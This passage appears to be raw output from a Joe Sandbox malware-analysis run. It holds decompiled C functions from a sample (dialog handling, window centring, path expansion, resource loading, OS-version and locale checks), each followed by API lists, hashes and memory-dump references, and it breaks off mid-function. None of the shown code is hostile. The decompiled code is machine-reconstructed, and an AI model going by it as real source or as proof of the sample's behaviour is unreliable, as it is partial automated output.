                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: d6288d1f983ac476c3afcab1d3bda6d73e5ec600e1eaee8c171a11f1749b33c3
                                                                                                                                                                                                        • Instruction ID: cd3e3249c4b14a00d9eaa68af3ee847c26e897247a0dc3b312d1aa8d3deec14e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6288d1f983ac476c3afcab1d3bda6d73e5ec600e1eaee8c171a11f1749b33c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0115175F00349AFDB10BFA5DC89ABEBB78EB44711F140569FA06E6390DA709D048BB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00DE43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xde9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00DE34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00DE34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00DE34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 76d0fdb0b4f2ffa8f1c52290887c15e3ae306d48958e726fb20d1b9090f5abe8
                                                                                                                                                                                                        • Instruction ID: d2c4b36c538cc86c083b63f5b2fe88d0f9959d5151537b2ef47aa36bd9b504c7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76d0fdb0b4f2ffa8f1c52290887c15e3ae306d48958e726fb20d1b9090f5abe8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7019E312403D6ABC7167F6ADC4C97D3A64EB45701F448014F946CB6E0CA31AF41CBB6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xde9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE1680(_t65, E00DE17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00DE65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00DE1680(_t65, E00DE17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2bba
                                                                                                                                                                                                        0x00de2bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2b28
                                                                                                                                                                                                        0x00de2b2e
                                                                                                                                                                                                        0x00de2b33
                                                                                                                                                                                                        0x00de2b39
                                                                                                                                                                                                        0x00de2b3c
                                                                                                                                                                                                        0x00de2b3c
                                                                                                                                                                                                        0x00de2b3e
                                                                                                                                                                                                        0x00de2b3f
                                                                                                                                                                                                        0x00de2b55
                                                                                                                                                                                                        0x00de2b5d
                                                                                                                                                                                                        0x00de2b64
                                                                                                                                                                                                        0x00de2b64
                                                                                                                                                                                                        0x00de2b7a
                                                                                                                                                                                                        0x00de2b7f
                                                                                                                                                                                                        0x00de2b81
                                                                                                                                                                                                        0x00de2b81
                                                                                                                                                                                                        0x00de2b84
                                                                                                                                                                                                        0x00de2b84
                                                                                                                                                                                                        0x00de2b86
                                                                                                                                                                                                        0x00de2b87
                                                                                                                                                                                                        0x00de2bbf
                                                                                                                                                                                                        0x00de2bc1
                                                                                                                                                                                                        0x00de2bc1
                                                                                                                                                                                                        0x00de2b26
                                                                                                                                                                                                        0x00de2bda
                                                                                                                                                                                                        0x00de2bda
                                                                                                                                                                                                        0x00de2be6
                                                                                                                                                                                                        0x00de2be6
                                                                                                                                                                                                        0x00de2bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00DE2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00DE2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00DE2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00DE2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00DE2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00DE2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: dd36150f138c839268d83971856eeb32b25cbf8bc575361d6d964d4215127482
                                                                                                                                                                                                        • Instruction ID: c73279af727de53a33fa412b9c036110cfb73a2036ee14f3b1d311ed015cf68b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd36150f138c839268d83971856eeb32b25cbf8bc575361d6d964d4215127482
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 874112346043C69EDB15BF358C94AFE7BAD9F56310F18409AE8C287206DB359E86CB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x00de4473
                                                                                                                                                                                                        0x00de4473
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de447a
                                                                                                                                                                                                        0x00de4481
                                                                                                                                                                                                        0x00de4484
                                                                                                                                                                                                        0x00de448a
                                                                                                                                                                                                        0x00de4492
                                                                                                                                                                                                        0x00de4496
                                                                                                                                                                                                        0x00de4496
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de44b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DE43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DE440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00DE4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00DE442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00DE443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00DE4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00DE44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 17d1cf27310b53f924162f19abb4b63b9c08e7707bd7cc41793282f4e24fe36d
                                                                                                                                                                                                        • Instruction ID: ce2aa0a203c3f5b55025430a78ac4f91f3136a70d7352c9061e63025502c1d43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17d1cf27310b53f924162f19abb4b63b9c08e7707bd7cc41793282f4e24fe36d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F314B32E00259AFCB14DFB8DD889EEBBB5EB89310F154169F805F7280DA70AD058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00DE6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00DE171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xdea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00DE171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00DE6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00de62e8
                                                                                                                                                                                                        0x00de62ea
                                                                                                                                                                                                        0x00de62eb
                                                                                                                                                                                                        0x00de62ef
                                                                                                                                                                                                        0x00de62f1
                                                                                                                                                                                                        0x00de62f3
                                                                                                                                                                                                        0x00de6302
                                                                                                                                                                                                        0x00de6308
                                                                                                                                                                                                        0x00de630d
                                                                                                                                                                                                        0x00de6314
                                                                                                                                                                                                        0x00de6314
                                                                                                                                                                                                        0x00de6316
                                                                                                                                                                                                        0x00de6319
                                                                                                                                                                                                        0x00de6355
                                                                                                                                                                                                        0x00de6357
                                                                                                                                                                                                        0x00de631b
                                                                                                                                                                                                        0x00de631b
                                                                                                                                                                                                        0x00de6331
                                                                                                                                                                                                        0x00de6334
                                                                                                                                                                                                        0x00de6339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6339
                                                                                                                                                                                                        0x00de6319
                                                                                                                                                                                                        0x00de636b
                                                                                                                                                                                                        0x00de637d
                                                                                                                                                                                                        0x00de637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00DE6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 5e073988b32bd30e50cf489aa9bb6b80ca848ca3f247b3defaeade7c152f2e22
                                                                                                                                                                                                        • Instruction ID: 2b780b037936633658de45ddcd660b181cde5799761f558ee62d0d9987debf41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e073988b32bd30e50cf489aa9bb6b80ca848ca3f247b3defaeade7c152f2e22
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9321F675A00399AFDB10BF66CC859BEBB78EB44750B180119FA02E7241DB35DD068BF1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xde81d8; // 0xfffffffe
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xde81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xde81d8; // 0xfffffffe
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xde1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
